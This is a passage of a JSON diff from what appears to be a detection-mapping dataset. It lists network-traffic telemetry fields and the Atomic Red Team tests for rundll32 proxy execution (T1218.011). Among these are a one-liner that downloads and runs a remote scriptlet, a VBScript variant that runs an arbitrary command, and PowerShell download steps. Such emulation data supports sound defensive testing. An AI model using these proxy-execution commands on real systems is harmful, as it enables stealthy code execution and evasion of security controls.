+ "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null + ] + }, + { + "technique_id": "T1218.011", + "command_list": [ + "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct\").Exec();\n", + "rundll32 vbscript:\"\\..\\mshtml,RunHTMLApplication \"+String(CreateObject(\"WScript.Shell\").Run(\"calc.exe\"),0)\n", + "rundll32.exe advpack.dll,LaunchINFSection PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n", + "rundll32.exe ieadvpack.dll,LaunchINFSection PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n", + "rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\\PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\n", + "rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 
.\\PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\n", + "rundll32.exe url.dll,OpenURL PathToAtomicsFolder\\T1218.011\\src\\index.hta\nrundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\\T1218.011\\src\\akteullen.vbs\n", + "rundll32.exe pcwutl.dll,LaunchApplication %windir%\\System32\\notepad.exe\n", + "rundll32.exe #{input_file}, StartW\n", + "rundll32.exe C:\\Users\\$env:username\\Downloads\\calc.png, StartW\n", + "rundll32.exe #{input_file},#2\n", + "rundll32.exe PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx64.dll,#2\n", + "rundll32.exe shell32.dll,Control_RunDLL #{input_file}\n", + "rundll32.exe shell32.dll,Control_RunDLL PathToAtomicsFolder\\T1047\\bin\\calc.dll\n", + "copy %windir%\\System32\\calc.exe not_an_scr.scr\nrundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr\n" + ], + "commands": [ + { + "command": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct\").Exec();\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32 vbscript:\"\\..\\mshtml,RunHTMLApplication \"+String(CreateObject(\"WScript.Shell\").Run(\"calc.exe\"),0)\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe advpack.dll,LaunchINFSection PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe ieadvpack.dll,LaunchINFSection PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy 
Execution: Rundll32" + }, + { + "command": "rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\\PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\\PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe url.dll,OpenURL PathToAtomicsFolder\\T1218.011\\src\\index.hta\nrundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\\T1218.011\\src\\akteullen.vbs\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe pcwutl.dll,LaunchApplication %windir%\\System32\\notepad.exe\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe #{input_file}, StartW\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe C:\\Users\\$env:username\\Downloads\\calc.png, StartW\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe #{input_file},#2\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx64.dll,#2\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe 
shell32.dll,Control_RunDLL #{input_file}\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe shell32.dll,Control_RunDLL PathToAtomicsFolder\\T1047\\bin\\calc.dll\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "copy %windir%\\System32\\calc.exe not_an_scr.scr\nrundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218.011", + "display_name": "Signed Binary Proxy Execution: Rundll32", + "atomic_tests": [ + { + "name": "Rundll32 execute JavaScript Remote Payload With GetObject", + "auto_generated_guid": "cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be", + "description": "Test execution of a remote script using rundll32.exe. 
Upon execution notepad.exe will be opened.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_url": { + "description": "location of the payload", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct" + } + }, + "executor": { + "command": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:#{file_url}\").Exec();\n", + "name": "command_prompt" + } + }, + { + "name": "Rundll32 execute VBscript command", + "auto_generated_guid": "638730e7-7aed-43dc-bf8c-8117f805f5bb", + "description": "Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.\nTechnique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/\nUpon execution calc.exe will be launched\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_to_execute": { + "description": "Command for rundll32.exe to execute", + "type": "String", + "default": "calc.exe" + } + }, + "executor": { + "command": "rundll32 vbscript:\"\\..\\mshtml,RunHTMLApplication \"+String(CreateObject(\"WScript.Shell\").Run(\"#{command_to_execute}\"),0)\n", + "name": "command_prompt" + } + }, + { + "name": "Rundll32 advpack.dll Execution", + "auto_generated_guid": "d91cae26-7fc1-457b-a854-34c8aad48c89", + "description": "Test execution of a command using rundll32.exe with advpack.dll.\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml\nUpon execution calc.exe will be launched\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "inf_to_execute": { + "description": "Local location of inf file", + "type": "String", + "default": "PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Inf file must exist on disk at specified 
location (#{inf_to_execute})\n", + "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf\" -OutFile \"#{inf_to_execute}\"\n" + } + ], + "executor": { + "command": "rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,\n", + "name": "command_prompt" + } + }, + { + "name": "Rundll32 ieadvpack.dll Execution", + "auto_generated_guid": "5e46a58e-cbf6-45ef-a289-ed7754603df9", + "description": "Test execution of a command using rundll32.exe with ieadvpack.dll.\nUpon execution calc.exe will be launched\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "inf_to_execute": { + "description": "Local location of inf file", + "type": "String", + "default": "PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Inf file must exist on disk at specified location (#{inf_to_execute})\n", + "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf\" -OutFile \"#{inf_to_execute}\"\n" + } + ], + "executor": { + "command": "rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,\n", + "name": "command_prompt" + } + }, + { + "name": "Rundll32 syssetup.dll Execution", + "auto_generated_guid": "41fa324a-3946-401e-bbdd-d7991c628125", + "description": "Test execution of a command using rundll32.exe with syssetup.dll. 
Upon execution, a window saying \"installation failed\" will be opened\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "inf_to_execute": { + "description": "Local location of inf file", + "type": "String", + "default": "PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Inf file must exist on disk at specified location (#{inf_to_execute})\n", + "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf\" -OutFile \"#{inf_to_execute}\"\n" + } + ], + "executor": { + "command": "rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\\#{inf_to_execute}\n", + "name": "command_prompt" + } + }, + { + "name": "Rundll32 setupapi.dll Execution", + "auto_generated_guid": "71d771cd-d6b3-4f34-bc76-a63d47a10b19", + "description": "Test execution of a command using rundll32.exe with setupapi.dll. 
